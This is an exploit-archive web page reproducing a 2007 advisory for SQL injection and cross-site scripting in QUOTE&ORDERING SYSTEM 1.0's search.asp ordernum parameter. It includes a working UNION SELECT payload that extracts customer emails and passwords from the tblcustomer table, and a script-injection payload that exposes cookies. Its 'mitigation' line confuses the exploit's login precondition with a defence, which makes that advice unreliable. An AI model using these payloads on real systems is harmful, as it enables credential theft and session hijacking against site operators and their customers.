Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
QUOTE&ORDERING SYSTEM
by:
ajann
N/A
CVSS
N/A
SQL Injection, XSS
Unknown
CWE
Product Name: QUOTE&ORDERING SYSTEM
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities

The QUOTE&ORDERING SYSTEM 1.0 (ordernum) is vulnerable to SQL Injection and XSS attacks. These vulnerabilities allow an attacker to execute arbitrary SQL queries and inject malicious scripts into the application.

Mitigation:

Register and login before performing any actions in the application. Apply proper input validation and sanitization techniques to prevent SQL Injection and XSS attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# $$      :  $250.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

Register & Login Before Injection..


http://[target]/[path]//search.asp?ordernum=[SQL]

Example:

//search.asp?ordernum=1+union+select+cemail,0,0,cpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tblcustomer&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now

[[/SQL]]

[[XSS]]]---------------------------------------------------------

Register & Login Before Injection..


http://[target]/[path]//search.asp?ordernum=[XSS]

Example:

//search.asp?ordernum=%3Cscript%3EJavaScript%3Aalert%28document.cookie%29%3B%3C%2Fscript%3E&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-05]